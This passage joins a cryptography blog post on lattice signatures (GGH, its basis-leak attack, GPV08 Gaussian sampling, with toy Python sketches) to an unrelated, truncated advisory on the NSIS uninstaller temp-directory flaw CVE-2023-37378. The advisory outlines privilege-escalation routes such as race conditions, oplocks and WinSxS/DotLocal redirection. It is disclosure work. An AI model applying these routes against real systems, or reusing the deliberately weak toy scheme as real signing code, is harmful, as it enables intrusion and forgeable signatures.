A signature scheme based on this idea was first proposed in 1997 by Goldreich, Goldwasser and Halevi, and is known as the GGH signature scheme [GGH]. At its core, the GGH signature scheme chooses a “good” basis for its secret key, and computes a matching “bad” public basis to use for verifying.

  • To sign a message m using GGH, one maps the message to a random target point \vec{t} in the underlying space, and uses the secret (“good”) basis to find a solution \vec{v} to the CVP_\gamma with target \vec{t} using Babai’s rounding algorithm. The signature is then \vec{\sigma} = \vec{t} - \vec{v}.
  • To verify the signature \vec{\sigma}, one recomputes \vec{t} from the message m, checks that \vec{t} - \vec{\sigma} is a lattice vector using the public basis, and that \vec{\sigma} is sufficiently short (by checking that \|\vec{\sigma}\| is below some publicly known bound, chosen as part of the signature scheme parameters).

(One could equivalently define the signature as the value \vec{\sigma} = \vec{v}, and check that \vec{t} - \vec{\sigma} is short and that \vec{\sigma} is a lattice vector during verification).
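The signing and verification steps above can be sketched as follows. This is a toy model only: the two-dimensional lattice, the bound BOUND_SQ and the way the hash is mapped to a target point are all assumptions made for illustration, and the lattice is so small that forgeries are easy. The sketch is meant to show the data flow, not to be a usable scheme.

```python
import hashlib
from fractions import Fraction

SECRET_BASIS = [(2, -1), (1, 1)]   # "good" basis, kept secret
PUBLIC_BASIS = [(10, 7), (9, 6)]   # "bad" basis of the same lattice
BOUND_SQ = 3                       # hypothetical bound on the squared norm

def coefficients(basis, t):
    (p, q), (r, s) = basis
    det = p * s - q * r
    return (Fraction(t[0] * s - t[1] * r, det),
            Fraction(p * t[1] - q * t[0], det))

def hash_to_target(message: bytes):
    """Illustrative mapping of a message to an integer target point."""
    d = hashlib.sha256(message).digest()
    return (int.from_bytes(d[:2], "big"), int.from_bytes(d[2:4], "big"))

def sign(message: bytes):
    t = hash_to_target(message)
    a, b = (round(c) for c in coefficients(SECRET_BASIS, t))  # Babai round-off
    (p, q), (r, s) = SECRET_BASIS
    v = (a * p + b * r, a * q + b * s)
    return (t[0] - v[0], t[1] - v[1])

def verify(message: bytes, sigma) -> bool:
    t = hash_to_target(message)
    v = (t[0] - sigma[0], t[1] - sigma[1])
    # Membership is checked with the public basis only.
    is_lattice_point = all(c.denominator == 1
                           for c in coefficients(PUBLIC_BASIS, v))
    is_short = sigma[0] ** 2 + sigma[1] ** 2 <= BOUND_SQ
    return is_lattice_point and is_short

sigma = sign(b"message")
print(verify(b"message", sigma))                       # True
print(verify(b"message", (sigma[0] + 1, sigma[1])))    # False: not a lattice point
```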

The GGH signature scheme was chosen as a foundation for the original NTRUSign signature scheme, by instantiating it with a lattice defined over a special class of rings (the NTRU lattice) which allows for a much more compact representation of the underlying lattice, leading to better efficiency and smaller keys.

Breaking the GGH/NTRUSign Signature Scheme

Unfortunately, the GGH signature construction leaks information about the secret basis with every new signature. Indeed, if a secret basis B was used to generate GGH signatures (where B is represented as a matrix), each signature can be mapped to a point in the fundamental parallelepiped defined by the (secret) basis B, and thus leak information about this secret basis.

Indeed, if m is mapped to the target point \vec{t}, the nearby lattice point found is \vec{v} and the corresponding signature is \vec{\sigma}, then we can rewrite \vec{v} = \lfloor \vec{t}B^{-1}\rceil B = \left(\vec{t}B^{-1} + \vec{e}\right)B = \vec{t} + \vec{e}B, for \vec{e} \in [-1/2,1/2]^n by choice of \vec{v} and the definition of Babai’s rounding algorithm, and hence

\vec{\sigma} = \vec{t} - \vec{v} = -\vec{e}B \in [-1/2,1/2]^nB = \{xB: x \in [-1/2,1/2]^n \}.

This can be seen graphically in the following figure, which plots the \vec{\sigma} = \vec{t} - \vec{v} values obtained from signatures generated using the two bases defined above: each new message-signature pair corresponds to a point in the fundamental parallelepiped defined by the basis used to generate it.

Nguyen and Regev [NR06] showed that this leakage can be used to recover the secret basis from a few hundred message-signature pairs, by using standard optimization techniques to recover the basis from these points in the fundamental parallelepiped.
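The leak is easy to observe experimentally. The sketch below is our own illustration, not the attack of [NR06]: it signs random targets with the toy secret basis used earlier, checks that every signature lies in the centered parallelepiped of that basis, and estimates the Gram matrix of the secret basis from the second moments of the signatures. Recovering such second-moment information is in the spirit of the first step of the attack; the full attack needs further optimization steps that are not shown here. The targets are drawn uniformly from a large square, which is an assumption of this experiment.

```python
import random

SECRET_BASIS = [(2, -1), (1, 1)]  # rows are the basis vectors

def basis_coordinates(basis, x):
    """Real coefficients of x with respect to the basis (Cramer's rule)."""
    (p, q), (r, s) = basis
    det = p * s - q * r
    return ((x[0] * s - x[1] * r) / det, (p * x[1] - q * x[0]) / det)

def ggh_signature(basis, t):
    """sigma = t - v, where v is the Babai round-off of t."""
    a, b = (round(c) for c in basis_coordinates(basis, t))
    (p, q), (r, s) = basis
    return (t[0] - (a * p + b * r), t[1] - (a * q + b * s))

rng = random.Random(0)
signatures = [ggh_signature(SECRET_BASIS,
                            (rng.uniform(0, 1000), rng.uniform(0, 1000)))
              for _ in range(20000)]

# Every signature has coordinates in [-1/2, 1/2] with respect to the secret basis.
inside = all(abs(c) <= 0.5 + 1e-9
             for sig in signatures
             for c in basis_coordinates(SECRET_BASIS, sig))
print(inside)  # True

# For coefficients uniform in [-1/2, 1/2], E[sigma^T sigma] = B^T B / 12,
# so 12 times the empirical second moments approximates the Gram matrix B^T B.
count = len(signatures)
gram_estimate = [[12 * sum(sig[i] * sig[j] for sig in signatures) / count
                  for j in range(2)] for i in range(2)]
print(gram_estimate)  # close to [[5, -1], [-1, 2]]
```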

Note:
The Nearest Planes Algorithm is an algorithm very similar to Babai’s round-off algorithm for solving CVP_\gamma that rounds based on the Gram-Schmidt vectors of the basis instead of the basis vectors themselves, and has very similar asymptotic hardness guarantees. While the GGH construction chose to use Babai’s rounding algorithm to solve CVP_\gamma, the Nearest Planes Algorithm can equivalently be used instead.

A Secure Signature Scheme Based on CVP – GPV08 Signatures

Despite the flaws in the GGH construction, the high-level idea of using a short basis as a trapdoor can still be made to work. In 2008, Gentry, Peikert and Vaikuntanathan [GPV08] showed how this lattice trapdoor framework can be adapted to create provably secure signatures.

The fundamental idea is simple: given a set of signatures \vec{\sigma}_m, we wish the distribution of these signatures to leak no information about the trapdoor function used to generate them. In particular, if the distribution of the signatures (over some fixed domain) is independent of the secret values used, no information can be leaked from the signatures using this method. Note that this was not the case with the GGH signature scheme, as the domain of the distribution was closely related to the geometry of the secret values.

Getting this to work in the lattice setting requires a slight generalization of the usual definition of trapdoor functions. A trapdoor permutation, such as the one with inverse f^{-1}(t) = t^d \mod(N) used in RSA FDH, defines a unique inverse for each element of the range. Choosing elements of the range of f uniformly (which could be done for instance by hashing a message to a random element of the range) thus results in a uniform distribution of signatures over the domain of f (or range of f^{-1}) and prevents the leak of any information about the secret integer d from the distribution of the signatures.

However, if we want to base our lattice trapdoors on the hardness of CVP_\gamma, there are multiple lattice points within a fixed, relatively short distance from the target, and hence each element of the range has multiple possible preimages. One must thus ensure that the distribution over these preimages obtained during the signing process leaks no information about the inversion function. That is, we want to define a trapdoor function f: D\to R that can only be inverted efficiently using some secret data, and such that the domain D and distribution P(D) over the domain obtained by choosing a uniformly random element of the range R (e.g. by hashing a message m to an element of R) and inverting the trapdoor function (computing f^{-1}) are independent of the secret data used to compute f^{-1}.

Thus, the trapdoor inversion function f^{-1} must guarantee both that the output is correct and that it follows the correct distribution, i.e. if \vec{\sigma}_m = f^{-1}(H(m)), we must have f( \vec{\sigma}_m) = H(m), and the distribution of all \vec{\sigma}_m values must be exactly P(D). This can be formalized using conditional distributions, i.e. by requiring that \vec{\sigma}_m is sampled from the distribution P(D), conditioned on the fact that f( \vec{\sigma}_m) = H(m). This generalized definition was formalized in [GPV08], in which the authors called functions that satisfy these properties “Preimage Sampleable Functions”.

Given such a preimage sampleable (trapdoor) function f and its inverse f^{-1}, one can define a trapdoor signature scheme in the usual way:

Sign(m):

1. Compute \vec{t} = H(m)
2. Output \vec{\sigma}_m = f^{-1}(\vec{t})

Verify(m, \vec{\sigma}_m):

1. Check that \vec{\sigma}_m is in the domain D
2. Check that f( \vec{\sigma}_m) = H(m).

Note that this definition avoids the problems with the GGH signature scheme. Indeed, if the domain D and the distribution of signatures P(D) over the domain are independent of the secret values, signatures chosen from P(D) cannot leak any information about the secret values used to compute them.

Preimage Sampleable Trapdoor Functions from Gaussians

However, it is not immediately clear that such preimage sampleable functions even exist, or how to compute them. In [GPV08], the authors showed that a Gaussian distribution can be used to define a family of preimage sampleable functions, due to some nice properties of Gaussian distributions over lattices.

The basic intuition as to why Gaussian distributions are particularly useful in this case is that a Gaussian of sufficient width overlaid over a lattice can easily be mapped to a uniform distribution over the underlying space, and is thus a great candidate for instantiating a preimage sampleable function. Indeed, consider sampling repeatedly from a Gaussian distribution centered at the origin, and reducing modulo the fundamental parallelepiped. As depicted in the following figure, the distribution that results from this process tends to the uniform distribution (over the fundamental parallelepiped) as the width of the Gaussian increases, and relatively small widths are sufficient to get close to a uniform distribution.
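This convergence can be checked numerically in the simplest case, the one-dimensional lattice of integers, where reducing modulo the fundamental parallelepiped just means taking the fractional part. The sketch below uses the Gaussian function e^{-x^2/s^2} (without any extra constant in the exponent, which is an assumption about normalization) and measures how far the density of the reduced distribution is from the uniform density 1 on [0,1).

```python
import math

def wrapped_gaussian_density(x, s, terms=50):
    """Density at x in [0, 1) of a width-s Gaussian reduced modulo 1."""
    normalization = s * math.sqrt(math.pi)  # integral of exp(-x^2 / s^2)
    total = sum(math.exp(-((x + k) / s) ** 2)
                for k in range(-terms, terms + 1))
    return total / normalization

def max_deviation_from_uniform(s, grid=1000):
    """Largest gap between the reduced density and the uniform density."""
    return max(abs(wrapped_gaussian_density(i / grid, s) - 1.0)
               for i in range(grid))

deviations = {s: max_deviation_from_uniform(s) for s in (0.25, 0.5, 1.0, 2.0)}
for s, deviation in deviations.items():
    print(f"width {s}: max deviation from uniform = {deviation:.3e}")
```

The deviation drops very quickly as the width grows: it is already small when the width is comparable to the spacing of the lattice, and is at the level of floating-point noise for a width of 2.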

Thus, we can define the distribution P(D) as a (truncated) Gaussian distribution \rho_s(D) of sufficient width s, with the domain D \subset \mathbb{R}^n chosen to be an area that contains all but a negligible fraction of the Gaussian distribution \rho_s(\mathbb{R}^n) (see footnote 3). By the properties of the Gaussian, if \mathcal{P}(\Lambda) is the fundamental parallelepiped defined by the public basis for the lattice \Lambda, the distribution of f(\vec{x}) = \vec{x} \mod \mathcal{P}(\Lambda) will be (statistically close to) uniform, for \vec{x} distributed as \rho_s(D).

To show that f is a preimage sampleable function and use it to instantiate a signature scheme, it remains to find a method to compute f^{-1}(\vec{t}) efficiently (given some secret values), i.e. define a method for sampling \vec{\sigma} from \rho_s(D), conditioned on f(\vec{\sigma})= \vec{t}, for uniformly random targets \vec{t} \in \mathcal{P}(\Lambda). To define this sampling method, note that the vectors \vec{x} with f(\vec{x}) = \vec{x} \mod \mathcal{P}(\Lambda) = \vec{t} are exactly the elements of the shifted lattice \vec{t} + \Lambda. Thus, sampling from \rho_s, conditioned on f(\vec{\sigma}) = \vec{t} is equivalent to sampling from the distribution \rho_s restricted to \vec{t} + \Lambda. In practice, this is done by sampling a lattice vector \vec{v} from the appropriate offset distribution \rho_{s,-\vec{t}\:}(\Lambda) (see footnote 4), and outputting \vec{t} + \vec{v}. Alternately, we can sample from \vec{w} \sim \rho_{s,\vec{t}\:}(\Lambda) and output \vec{t} - \vec{w}, since both the Gaussian distribution and the lattice \Lambda are invariant under reflection.

The final piece of the puzzle is to figure out how to sample from \rho_{s,\vec{t}}(\Lambda) efficiently. At the core of [GPV08] was a new efficient Gaussian sampler over arbitrary lattices, which is based on the observation that one can sample from the desired Gaussian distribution over a lattice, if one knows a “good” quality basis (chosen as the secret trapdoor for this scheme; see footnote 5). The resultant algorithm can be thought of as a randomized version of the nearest planes algorithm, where instead of selecting the nearest plane at each step, one selects a nearby plane, according to the (discrete) Gaussian distribution over the candidate planes. In [Pei10], Peikert showed that Babai’s round-off algorithm can be similarly randomized coordinate-by-coordinate, at the cost of an extra perturbation technique to account for the skew introduced by the fact that basis vectors are generally not an orthogonal set.
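A minimal sketch of such a randomized nearest-plane sampler is given below. It is a floating-point illustration, not a secure or constant-time implementation: the one-dimensional sampler uses simple rejection sampling with a tail cut (the tail parameter is our assumption), the Gaussian function is taken as e^{-x^2/s^2}, and the basis, width and center are example values.

```python
import math
import random

def dot(u, v):
    return sum(a * b for a, b in zip(u, v))

def sample_z(center, s, rng, tail=12):
    """Rejection-sample an integer from a discrete Gaussian around `center`."""
    lo, hi = math.floor(center - tail * s), math.ceil(center + tail * s)
    while True:
        x = rng.randint(lo, hi)
        if rng.random() < math.exp(-((x - center) / s) ** 2):
            return x

def gram_schmidt(basis):
    """Gram-Schmidt orthogonalization (without normalization)."""
    ortho = []
    for b in basis:
        v = list(b)
        for u in ortho:
            mu = dot(b, u) / dot(u, u)
            v = [vi - mu * ui for vi, ui in zip(v, u)]
        ortho.append(v)
    return ortho

def sample_lattice_gaussian(basis, s, center, rng):
    """Randomized nearest planes: pick a nearby plane at each step, last vector first."""
    ortho = gram_schmidt(basis)
    c = list(center)
    v = [0] * len(center)
    for b, b_star in zip(reversed(basis), reversed(ortho)):
        norm_sq = dot(b_star, b_star)
        z = sample_z(dot(c, b_star) / norm_sq, s / math.sqrt(norm_sq), rng)
        c = [ci - z * bi for ci, bi in zip(c, b)]   # move the remaining target
        v = [vi + z * bi for vi, bi in zip(v, b)]   # accumulate the lattice point
    return tuple(v)

SECRET_BASIS = [(2, -1), (1, 1)]
rng = random.Random(1)
samples = [sample_lattice_gaussian(SECRET_BASIS, 4.0, (5.0, 3.0), rng)
           for _ in range(200)]
print(samples[:5])
```

Every output is an integer combination of the basis vectors, hence a lattice point, and the samples concentrate around the requested center.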

The output of this sampling algorithm is effectively chosen randomly from the solutions to the CVP_\gamma problem, and since the resultant signatures are distributed as a Gaussian distribution that is independent from the basis, no information about the geometry of the secret basis used by the sampler is leaked. This can be formalized by noting that by definition, we have \vec{t} - \vec{w} \in D, and hence \vec{w} \in \Lambda is at a distance of at most \|\vec{t} - \vec{w}\| \leq \|D\| from the target \vec{t}. Choosing a sufficiently small domain D as part of the definition for the signature scheme ensures \vec{w} is a solution to the CVP_\gamma problem with target \vec{t}.

Putting this all together, we can define a CVP_\gamma-based trapdoor signature scheme as follows:

Sign(m):
1. Compute \vec{t} = H(m) to be a uniformly random point in \mathcal{P}(\Lambda)
2. Compute \vec{\sigma}_m = f^{-1}(\vec{t}):
    1. Sample \vec{w} \sim \rho_{s,\vec{t}\:}(\Lambda), using the secret basis for \Lambda.
    2. Set \vec{\sigma}_m = \vec{t} - \vec{w}. Note that \vec{\sigma}_m is distributed as \rho_s(D) conditioned on f(\vec{\sigma}_m) = \vec{t}.
3. Output the signature \vec{\sigma}_m
Verify(m, \vec{\sigma}_m):
1. Check that \vec{\sigma}_m is in the domain D
2. Recompute \vec{t} = H(m), and check that f(\vec{\sigma}_m) = \vec{\sigma}_m \mod{\mathcal{P}(\Lambda)} = \vec{t} (or, equivalently, check that \vec{t} - \vec{\sigma}_m is a lattice vector, since \vec{x} \equiv \vec{0} \mod{\mathcal{P}(\Lambda)} if and only if \vec{x} \in \Lambda).

The authors of [GPV08] used this construction to define an efficient trapdoor signature scheme based on the CVP_\gamma problem in lattices. Their particular instantiation is defined over a family of lattices that allows particularly efficient operations, and thus yields an efficient signature scheme. The following section goes into details about their construction, which follows the same high-level approach as was covered here. However, it is a little more technical and can be skipped if only the high-level intuition is desired.

As a bonus, this lattice-based trapdoor scheme has provable security properties. It can be shown that the (average-case) security of this scheme can be reduced to the worst-case hardness of a well-studied lattice problem, the Shortest Independent Vectors Problem (SIVP_\gamma). This is particularly useful, as the worst-case hardness of a problem is often easier to analyze than the average-case hardness (i.e. the hardness of a randomly-selected instance, such as when keys are chosen at random).

The secure trapdoor construction of [GPV08] was eventually adapted in the design of the NIST candidate Falcon, which consists of [GPV08] trapdoor signatures instantiated over a special class of compact lattices called the NTRU lattices. Falcon is the smallest of the NIST PQC finalists, when comparing the total size of public key and signature, and has very fast verification. However, the implementation of Falcon has a lot of complexity – in particular, implementing the discrete Gaussian sampler securely and in constant-time is tricky, as the reference implementation uses floating point numbers for this computation.

Details of the [GPV08] Trapdoor Signature Construction

At a high-level, the [GPV08] construction relies on instantiating the above construction over a discrete domain and range, in order to allow for more efficient computations. In particular, the construction is defined over the q-ary lattices \Lambda(A) and \Lambda^\perp(A). This is done for two reasons: first, this allows for more efficient membership verification, as checking whether x is in the q-ary lattice \Lambda^\perp(A) only requires checking whether Ax \equiv 0 \mod{q}. Second, restricting ourselves to a discrete range and domain simplifies many computations, and allows us to better formalize what it means for target points to be distributed uniformly over the range, as it is easier to map the outputs of a hash function to a discrete domain than to a continuous one.

However, working with discrete q-ary lattices requires modifying the definitions and distributions to work over this new domain and range. In particular, we define the discrete Gaussian distribution over a lattice as the discrete-domain version of the Gaussian distribution which preserves these nice properties of uniformity over the chosen discrete domain in a natural way. Specifically, a smoothing discrete Gaussian distribution can be defined over a superlattice, a finer-gridded lattice \Lambda^\prime such that \Lambda \subseteq \Lambda^\prime. The smoothing discrete Gaussian distribution over the superlattice, D_{\Lambda^\prime}, can then be defined in such a way that it results in a uniform distribution when reduced modulo the fundamental parallelepiped. Note that the range of this mapping, i.e. the set of possible values of \Lambda^\prime \mod \mathcal{P}(\Lambda), corresponds exactly to the set of cosets \Lambda^\prime / \Lambda.

In particular, in the case of q-ary lattices, we can choose \Lambda^\prime = \mathbb{Z}^m and \Lambda = \Lambda^\perp(A). From the definition, we get that a sufficiently wide discrete Gaussian distribution D_{\mathbb{Z}^m} that is smoothing over the lattice \Lambda^\perp will result in a uniform distribution over the set of cosets \mathbb{Z}^m / \Lambda^\perp when reduced modulo the fundamental parallelepiped \mathcal{P}(\Lambda^\perp). Additionally, we can use a correspondence between the set of cosets \mathbb{Z}^m / \Lambda^\perp, and the set of syndromes (see footnote 6) U = \{\vec{u}: \vec{u} = A\vec{x} \mod{q} \text{ for some } \vec{x} \in \mathbb{Z}^m\} to show that if we sample \vec{x} \sim D_{\mathbb{Z}^m}, choosing the width so that D_{\mathbb{Z}^m} is smoothing over the lattice \Lambda^\perp, then the distribution of A\vec{x} \mod{q} will be uniform over the set of syndromes U.

Thus, to instantiate the secure trapdoor construction of [GPV08] with q-ary lattices, messages are mapped uniformly to the set of syndromes U, and signatures \vec{\sigma} are sampled from the (smoothing) distribution D_{\mathbb{Z}^m}, conditioned on A\vec{\sigma} being equal to the syndrome corresponding to a particular message. Finally, we can choose parameters such that we can guarantee that for almost all choices of A, U = \mathbb{Z}_q^n. Thus, messages only need to be mapped uniformly to \mathbb{Z}_q^n, which can be done in a straightforward manner using an appropriately defined hash function.

As before, sampling from the (smoothing) distribution D_{\mathbb{Z}^m}, conditioned on A\vec{\sigma} = \vec{u} can be done by mapping the syndrome back to the corresponding coset \vec{t}, sampling a lattice vector \vec{w} \in \Lambda^\perp from the shifted distribution D_{\Lambda^\perp, \vec{t}} (corresponding to sampling from D_{\mathbb{Z}^m}(\vec{t} + \Lambda^\perp)), and outputting \vec{t} - \vec{w}. Note that the vector \vec{w} is a solution to the CVP_\gamma problem with lattice \Lambda^\perp and target \vec{t}. Putting everything together, we can choose f(\vec{e}) = A\vec{e} \mod{q}, and instantiate a trapdoor signature scheme as follows:

Sign(m):
1. Choose \vec{u} = H(m) \in \mathbb{Z}_q^n to be a uniformly random syndrome from U = \mathbb{Z}_q^n
2. Compute \vec{\sigma}_m = f^{-1}(\vec{u}):
    1. Choose \vec{t} \in \mathbb{Z}^m, an arbitrary preimage such that f(\vec{t}) = A\vec{t} = \vec{u} \mod{q} (this can be done via standard linear algebra)
    2. Sample \vec{w} \sim D_{\Lambda^\perp, \vec{t}}, the discrete Gaussian distribution over \Lambda^\perp centered at \vec{t}.
    3. Let \vec{\sigma}_m = \vec{t} - \vec{w}. Note that \vec{\sigma}_m is distributed as D_{\mathbb{Z}^m}, conditioned on A\vec{\sigma}_m = \vec{u} \mod{q}.
3. Output the signature \vec{\sigma}_m.
Verify(m, \vec{\sigma}_m):
1. Check whether \vec{\sigma}_m is contained in the domain D (in practice, this amounts to checking whether \| \vec{\sigma}_m\| is sufficiently small).
2. Check whether A \vec{\sigma}_m = H(m) \mod{q}. Note that A \vec{\sigma}_m = A(\vec{t} - \vec{w}) = A\vec{t} - A \vec{w} = \vec{u} - \vec{0} = \vec{u} \mod{q}, by choice of \vec{t} and definition of \Lambda^\perp.
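The algebra behind step 2.1 of signing and step 2 of verification can be checked with a small sketch. Everything here is an illustrative assumption: the modulus, the matrix block A1, and the choice of a matrix of the form A = [A1 | I], which makes finding an arbitrary preimage trivial. Most importantly, the vector \vec{w} below is an arbitrary element of \Lambda^\perp(A), not a discrete Gaussian sample obtained from a short trapdoor basis, so this is not a signing algorithm; it only shows why subtracting a vector of \Lambda^\perp(A) preserves the syndrome.

```python
import random

q = 97
A1 = [[3, 14, 15],
      [92, 65, 35]]   # illustrative block; the full matrix is A = [A1 | I_n]
n, k = 2, 3           # n rows, m = k + n columns

def f(x):
    """f(x) = A x mod q for A = [A1 | I_n]."""
    return [(sum(A1[i][j] * x[j] for j in range(k)) + x[k + i]) % q
            for i in range(n)]

def arbitrary_preimage(u):
    """t = (0, ..., 0, u) satisfies A t = u, since A ends with the identity."""
    return [0] * k + list(u)

def some_perp_vector(rng):
    """An arbitrary vector of Lambda^perp(A): pick the head, then cancel it mod q."""
    head = [rng.randint(-5, 5) for _ in range(k)]
    tail = [-sum(A1[i][j] * head[j] for j in range(k)) + q * rng.randint(-1, 1)
            for i in range(n)]
    return head + tail

rng = random.Random(2)
u = [12, 34]                       # stands in for the hashed message H(m)
t = arbitrary_preimage(u)
w = some_perp_vector(rng)
sigma = [ti - wi for ti, wi in zip(t, w)]

print(f(t) == u)        # True: t is a preimage of the syndrome
print(f(w) == [0, 0])   # True: w is in Lambda^perp(A)
print(f(sigma) == u)    # True: t - w has the same syndrome as t
```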

Conclusion

Lattice-based [GPV08]-style trapdoor signatures are a generalization of the classical hash-and-sign signature paradigm that randomizes the signing process in order to account for the existence of multiple preimages and to avoid leaking information about the geometry of the secret basis. This approach allows the resultant signatures to be very short, at the cost of some implementation complexity.

While the construction may seem intimidating at first, we hope this write-up has made this modified lattice-based construction a little more approachable. Stay tuned for the second part of this blog post series, which will describe an alternate construction for lattice-based signatures, based on the Fiat-Shamir paradigm.

Acknowledgements


I’d like to thank Paul Bottinelli, Giacomo Pope and Thomas Pornin for their valuable feedback on earlier drafts of this blog post. Any remaining errors are mine alone.

Footnotes

1: Formally, two bases B_1 and B_2 define the same lattice if and only if there is a unimodular matrix (a square, integer matrix with determinant \pm 1, or, equivalently, an integer matrix which is invertible over the integers) U such that B_1 = UB_2.

2: For an appropriately chosen instance of the CVP_\gamma problem. Concretely, one usually chooses values around n = 512 and \gamma = \widetilde{O}(n) for cryptographic applications.

3: The exact width needed can be formalized using a quantity known as the smoothing parameter, which relates the width of a Gaussian distribution \rho_s to the distance from uniform of the reduced distribution of \rho_s \mod(\Lambda). It can be shown that relatively narrow Gaussians are sufficient to obtain a negligible distance from uniform – for instance, the lattice of integers \mathbb{Z} has a smoothing parameter of \approx 5 for \varepsilon = 2^{-128} distance from uniform. The domain D can simply be defined as all points within a certain distance from the origin, with the distance chosen as a small multiple of the width s, since the exponential decay of the Gaussian function means almost all of the weight is given to points near the origin.

4: The offset distribution \rho_{s, \vec{c}} is simply a Gaussian distribution of width s that is centered at the point \vec{c}, and can be defined as \rho_{s, \vec{c}}(\vec{x})  = e^{-\|\vec{x} - \vec{c}\|^2/s^2}

5: Any basis can be used to implement this sampler, but one can only sample from Gaussian distributions that are sufficiently wider than the longest vector in a known basis. One can thus choose a width such that the Gaussian still maps to the uniform distribution under f, but such that it is infeasible to sample from the Gaussian distribution without knowledge of the secret basis to instantiate the signature scheme.

6: The term syndrome comes from the terminology used for error correcting codes, due to similarities between the q-ary lattices and the error syndrome, which can be used to locate errors in linear codes. Similarly, the matrix A is sometimes called the parity-check matrix for the lattice \Lambda^\perp(A), in analogy to the parity check matrix of linear error correcting codes.

References

[Ajtai96]: M. Ajtai, Generating Hard Instances of Lattice Problems, 1996, https://dl.acm.org/doi/10.1145/237814.237838.

[NR06]: P. Nguyen and O. Regev, Learning a Parallelepiped: Cryptanalysis of GGH and NTRU Signatures, 2006, https://cims.nyu.edu/~regev/papers/gghattack.pdf.

[GPV08]: C. Gentry et al., How to Use a Short Basis: Trapdoors for Hard Lattices and New Cryptographic Constructions, 2008, https://eprint.iacr.org/2007/432.pdf.

[Falcon]: P. Fouque et al., Falcon: Fast-Fourier Lattice-based Compact Signatures over NTRU, 2020, https://falcon-sign.info/falcon.pdf.

[Dilithium]: S. Bai et al., CRYSTALS-Dilithium Algorithm Specifications and Supporting Documentation (Version 3.1), 2021, https://pq-crystals.org/dilithium/data/dilithium-specification-round3-20210208.pdf.

[BR96]: M. Bellare and P. Rogaway, The Exact Security of Digital Signatures – How to Sign with RSA and Rabin, 1996, https://www.cs.ucdavis.edu/~rogaway/papers/exact.pdf.

[GGH]: O. Goldreich et al., Public-Key Cryptosystems from Lattice Reduction Problems, 1997, https://www.wisdom.weizmann.ac.il/~oded/PSX/pkcs.pdf.

[Pei10]: C. Peikert, An Efficient and Parallel Gaussian Sampler for Lattices, 2010, https://eprint.iacr.org/2010/088.pdf.

Technical Advisory – Nullsoft Scriptable Installer System (NSIS) – Insecure Temporary Directory Usage

Title: Nullsoft Scriptable Installer System (NSIS) - Insecure Temporary Directory Usage
Vendor URL: https://nsis.sourceforge.io/Main_Page
Versions Affected: NSIS 3.08 (September 25, 2021) and below
CVE Identifier: CVE-2023-37378
Risk:
7.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
7.3 CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Author: Richard Warren <richard.warren[at]nccgroup.com>

Description

The NSIS uninstaller package did not enforce appropriate permissions on the temporary directory used during the uninstall process. Furthermore, it did not ensure that the temporary directory was removed before running executable content from it. This could potentially result in privilege escalation under certain scenarios.

Impact

A low-privileged, local attacker could exploit this vulnerability to execute arbitrary code with the privileges of the user that launched the uninstaller – potentially resulting in privilege escalation. An example of this could be a privileged Windows service that runs as SYSTEM and launches an NSIS uninstall.exe package. A malicious user could exploit this vulnerability to gain code execution with the privileges of that service.

Technical Details

During the uninstall process, the NSIS uninstaller.exe executable creates a temporary sub-directory under the current user’s %TEMP% folder. It then copies itself to this directory before executing the new temporary executable with CreateProcess. However, the uninstaller executable does not protect this temporary directory from removal when it has been launched from a privileged context. Additionally, it ignores the ERROR_ALREADY_EXISTS code returned by CreateDirectory, and applies an overly-permissive ACL to the existing directory instead.

This allows any user in the Everyone group to delete the folder and re-create it with malicious content.

A malicious user could exploit these weaknesses to create a “poisoned” temporary directory containing a payload – which would get executed by the uninstaller. Looking at the nsis-3.08 source code, we can find the following line in Source\exehead\Main.c

On line 352, the program makes a call to UserIsAdminGrpMember and sets the admin variable to the return value. The UserIsAdminGrpMember function calls the shell32!IsUserAnAdmin Windows API function.

This function is simply a wrapper for SHTestTokenMembership, which checks that the user’s token contains the RID 0x220 (i.e. SID S-1-5-32-544 (BUILTIN_ADMINISTRATORS)).

If an uninstaller is launched as SYSTEM, it will pass the UserIsAdminGrpMember check, since the uninstaller.exe process token will contain the administrator SID. Furthermore, its %TEMP% and %TMP% variables will be set to the global C:\Windows\Temp temporary directory (via a call to GetTempPath), which all users have Write access to.

As such, the NSIS code will go on to call the CreateRestrictedDirectory function, as the value of admin will be 1. However, if we look at the code for this function, we can see that the ACL applied using SetFileSecurity includes an ACE which allows Everyone to have DELETE permissions.

Additionally, although the CreateRestrictedDirectory function checks the CreateDirectory return code for ERROR_ALREADY_EXISTS, it does not re-create the folder. Instead, it applies the permissive ACL to the existing folder. This means that if the folder already contains malicious content, it will not be removed.
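
The difference between reusing an existing directory and insisting on a fresh one can be illustrated with a short Python analogy. This is not the NSIS code (which is C and relies on Windows ACLs); the function names are hypothetical, and the permission mode passed to os.mkdir is largely ignored on Windows, so the sketch only demonstrates the "already exists" handling.

```python
import os
import shutil
import tempfile

def prepare_dir_insecure(path):
    """Mirrors the flawed pattern: an existing directory is silently reused."""
    try:
        os.mkdir(path)
    except FileExistsError:
        pass  # pre-planted content survives
    return path

def prepare_dir_safer(path):
    """Remove whatever is there, then require that creation is fresh."""
    if os.path.lexists(path):
        if os.path.islink(path):
            raise RuntimeError("refusing to follow a symlink")
        shutil.rmtree(path)
    # Raises FileExistsError if someone re-created the directory in between.
    os.mkdir(path, mode=0o700)
    return path

# Demonstration inside a throwaway sandbox directory.
base = tempfile.mkdtemp()
target = os.path.join(base, "~nsuA.tmp")
os.mkdir(target)
open(os.path.join(target, "planted.dll"), "w").close()

prepare_dir_insecure(target)
print(os.listdir(target))  # ['planted.dll']
prepare_dir_safer(target)
print(os.listdir(target))  # []
shutil.rmtree(base)
```

Even the safer variant leaves a window between deletion and creation, which is why a per-process, unpredictable directory name is the more robust design.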

The NSIS uninstaller does attempt to remove any existing Un_X.exe executables from the ~nsuA.tmp folder. However, any other content will be left in place.

There is also a potential TOCTOU issue: since CopyFile is used to write the Un_X.exe file, no exclusive handle is maintained on the file. Therefore an attacker may be able to win a race between the moment the file is written with CopyFile and the moment it is launched with CreateProcess. The attacker could potentially improve their chances of winning this race by using oplocks.

Exploitation

Whilst it is tricky to exploit a race condition, and DLL hijacking is generally mitigated by the use of SetDefaultDllDirectories in NSIS, another way to exploit this vulnerability would be to abuse Windows Side-by-Side (WinSxS) assembly loading and DotLocal redirection.

